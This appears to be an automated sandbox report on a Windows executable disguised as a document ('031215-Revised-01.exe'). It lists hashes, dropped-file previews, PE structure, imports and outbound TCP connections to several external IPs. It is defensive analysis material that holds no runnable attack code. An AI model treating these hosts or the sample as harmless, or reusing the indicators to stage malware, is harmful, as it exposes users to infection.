                                      SHA-512:424ED5C8F10D00E74022EDE6231A57820AB48AA55DF3DF94E618A7B5E28B15217BFD2ADF2FEC9855D12748F2D26BC132F1535A8470C658774F203FFCBEBE0201
                                      Malicious:false
                                      Preview:.....UTIQ..@......O4.pHE...RUTIQUUAI92Y13UO718OXKMUFSRUTI.UUAG&.W1.\...9..j.=/ r%&&6'4,iZS7_\!oUT.=-%m<(s...i<:1$g4?S.3UO718O!JD.{35.i)6.h!..(...o/P."..q5!.H...m52..PQ1.S2.718OXKMU..RU.HPU...d2Y13UO71.OZJFTMSR.PIQUUAI92Y.&UO7!8OX+IUFS.UTYQUUCI94Y13UO71>OXKMUFSR5PIQWUAI92Y33..71(OX[MUFSBUTYQUUAI9"Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y.G07C18OL.IUFCRUT.UUUQI92Y13UO718OXKmUF3RUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUAI92Y13UO718OXKMUFSRUTIQUUA

                                      C:\Users\user\AppData\Local\Temp\eupolyzoan

                                      Download File
                                      Process:C:\Users\user\Desktop\031215-Revised-01.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):86022
                                      Entropy (8bit):4.17980221192401
                                      Encrypted:false
                                      SSDEEP:768:Y71DVAIGDoLqVGO9gHhoBDzZ6QyvjRN+zqssyJfkCrY0INznci6C2CdaZfcW9UTj:YpPm0O9wEDAXjasqhrahEhyapwTeAxB
                                      MD5:2BE24264E6D80923E906D39F4CD3BB31
                                      SHA1:57EA25A17EBECB2D177CFBEC9BC0C3DFFB071AF1
                                      SHA-256:E41073C862814FB569500C6B4060AB5AF9BC7A539286B6A3095C0263BDF49089
                                      SHA-512:C5EE360DFE74E8DD8476B98B6A135FA1B40A91F8901BCA1F504EA174EA767F6E2EEBCAAE20E55DA4DF76B8A1EB7965E2A177043EA3174809F3119B0324EC6A0E
                                      Malicious:false
                                      Preview:30U78U35I35C38Q62X65U63Y38Y31X65B63S63K63S30M32G30O30H30S30V35Y36W35E37D62Q38L36K62V30I30N30O30D30G30X36P36W38E39E34I35N38R34D62P39X36R35A30V30V30P30C30E30M36D36I38Y39Z34O64J38T36J62P61W37D32F30T30U30F30P30G30X36N36U38I39S35W35N38W38R62V38W36Y65K30A30A30X30O30N30I36D36T38J39R34U35X38R61T62P39T36C35A30U30J30O30W30Z30S36X36M38B39T34Y64C38S63N62T61G36B63V30Z30H30V30R30J30J36M36W38P39L35K35B38J65G62L38L33W33O30H30K30X30B30U30J36Y36P38N39A34O35T39X30H62V39V33G32U30T30O30W30Q30K30Z36B36Z38H39K34D64N39R32M62I61C32Z65S30F30O30S30A30B30U36W36H38M39A35K35J39B34J62W38R36T34O30V30V30X30Z30Q30Q36Q36H38I39T34S35D39N36Q62F39Q36F63C30H30L30F30R30A30N36B36K38U39P34B64K39M38P62E61X36O63N30G30C30E30W30E30J36H36Z38E39I35D35C39Z61O33D33X63W30S36D36B38E39Z34Z35A39O63V62O39X36C65V30J30D30Q30T30C30E36D36T38H39I38T64J34J34S66U66C66V66P66H66B62F61W37Q34Y30J30V30B30S30I30A36S36S38A39X39E35L34R36X66Q66S66A66B66E66U62S38G36T34K30D30Y30Z30U30G30Z36B36Q38H39E38M35D34E38Y66Z66Z66C66S66Z66U62P39J36F63P30X30H30H30O30P3

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.1263317709111975
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:031215-Revised-01.exe
                                      File size:1'276'416 bytes
                                      MD5:1bf161b2bc2c8efddf6fbc402dfb9508
                                      SHA1:0525fb1f6e537a26faf3438b1d5d9e118e3a9a52
                                      SHA256:99e143144585b210119ead96a354e3425f4b84a58a7554de9e89aa3a9154c21f
                                      SHA512:808203ff2a5cb4b2cccb0c1856b2c71768914f346432b09e29a2d5339a6cbc240f2ea3089c602634b63cc93625ca5fdee824a32ef3fe960a1606ea075fc3c45f
                                      SSDEEP:24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a3OmaIZB6R8l95/Ijc:CTvC/MTQYxsWR7a3BQ
                                      TLSH:CB45CF027381C062FF9B92734F5AF6515BBC6A260123E51F13A81DB9BE705B1463E7A3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                      File Icon

                                      Icon Hash:61b1b1654c004101

                                      Static PE Info

                                      General

                                      Entrypoint:0x420577
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66CC6071 [Mon Aug 26 11:01:05 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:948cc502fe9226992dce9417f952fce3

                                      Entrypoint Preview

                                      Instruction
                                      call 00007FE77C801F53h
                                      jmp 00007FE77C80185Fh
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FE77C801A3Dh
                                      mov dword ptr [esi], 0049FDF0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FDF8h
                                      mov dword ptr [ecx], 0049FDF0h
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007FE77C801A0Ah
                                      mov dword ptr [esi], 0049FE0Ch
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 0049FE14h
                                      mov dword ptr [ecx], 0049FE0Ch
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      and dword ptr [eax], 00000000h
                                      and dword ptr [eax+04h], 00000000h
                                      push eax
                                      mov eax, dword ptr [ebp+08h]
                                      add eax, 04h
                                      push eax
                                      call 00007FE77C8045FDh
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      lea eax, dword ptr [ecx+04h]
                                      mov dword ptr [ecx], 0049FDD0h
                                      push eax
                                      call 00007FE77C804648h
                                      pop ecx
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 0049FDD0h
                                      push eax
                                      call 00007FE77C804631h
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x60fb4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1350000x7594.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0xd40000x60fb40x61000b654d18ab25c2b3c7765ecb95a6dc106False0.9161288861146907data7.822238214648054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1350000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xd44e80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                      RT_ICON0xd46100x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                      RT_ICON0xd47380x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                      RT_ICON0xd48600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.1617855455833727
                                      RT_ICON0xd8a880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.2598547717842324
                                      RT_ICON0xdb0300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.29338649155722324
                                      RT_ICON0xdc0d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.4654255319148936
                                      RT_MENU0xdc5400x50dataEnglishGreat Britain0.9
                                      RT_STRING0xdc5900x594dataEnglishGreat Britain0.3333333333333333
                                      RT_STRING0xdcb240x68adataEnglishGreat Britain0.2735961768219833
                                      RT_STRING0xdd1b00x490dataEnglishGreat Britain0.3715753424657534
                                      RT_STRING0xdd6400x5fcdataEnglishGreat Britain0.3087467362924282
                                      RT_STRING0xddc3c0x65cdataEnglishGreat Britain0.34336609336609336
                                      RT_STRING0xde2980x466dataEnglishGreat Britain0.3605683836589698
                                      RT_STRING0xde7000x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                      RT_RCDATA0xde8580x561e4data1.0003288541135114
                                      RT_GROUP_ICON0x134a3c0x3edataEnglishGreat Britain0.8548387096774194
                                      RT_GROUP_ICON0x134a7c0x14dataEnglishGreat Britain1.25
                                      RT_GROUP_ICON0x134a900x14dataEnglishGreat Britain1.15
                                      RT_GROUP_ICON0x134aa40x14dataEnglishGreat Britain1.25
                                      RT_VERSION0x134ab80x10cdataEnglishGreat Britain0.585820895522388
                                      RT_MANIFEST0x134bc40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                      Imports

                                      DLLImport
                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                      PSAPI.DLLGetProcessMemoryInfo
                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                      UxTheme.dllIsThemeActive
                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishGreat Britain

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 26, 2024 18:27:33.567845106 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:33.572690010 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:33.572772026 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:33.584745884 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:33.589787960 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087604046 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087625027 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087671041 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087687016 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087701082 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.087791920 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.087835073 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087851048 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087867022 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087887049 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.087883949 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087913990 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.087924004 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.088057041 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.088097095 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.088231087 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:35.088273048 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.092236996 CEST4973680192.168.2.4194.233.65.154
                                      Aug 26, 2024 18:27:35.097054005 CEST8049736194.233.65.154192.168.2.4
                                      Aug 26, 2024 18:27:50.138086081 CEST4973880192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:50.143923998 CEST804973845.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:50.143994093 CEST4973880192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:50.152690887 CEST4973880192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:50.158716917 CEST804973845.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:51.031419039 CEST804973845.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:51.031676054 CEST804973845.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:51.031730890 CEST4973880192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:51.655409098 CEST4973880192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:52.674280882 CEST4973980192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:52.679238081 CEST804973945.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:52.679327965 CEST4973980192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:52.688072920 CEST4973980192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:52.693140030 CEST804973945.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:53.557790995 CEST804973945.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:53.557898998 CEST804973945.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:53.557957888 CEST4973980192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:54.202301025 CEST4973980192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:55.225182056 CEST4974080192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:55.230034113 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.230134010 CEST4974080192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:55.239108086 CEST4974080192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:55.243977070 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244033098 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244076014 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244085073 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244108915 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244129896 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244183064 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244191885 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:55.244199038 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:56.331223011 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:56.332026005 CEST804974045.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:56.332108974 CEST4974080192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:56.749193907 CEST4974080192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.767294884 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.772185087 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:57.772260904 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.778049946 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:57.782944918 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:58.639003992 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:58.639019012 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:27:58.639167070 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:58.641519070 CEST4974180192.168.2.445.157.69.194
                                      Aug 26, 2024 18:27:58.646312952 CEST804974145.157.69.194192.168.2.4
                                      Aug 26, 2024 18:28:04.013533115 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:04.018480062 CEST804974337.187.158.211192.168.2.4
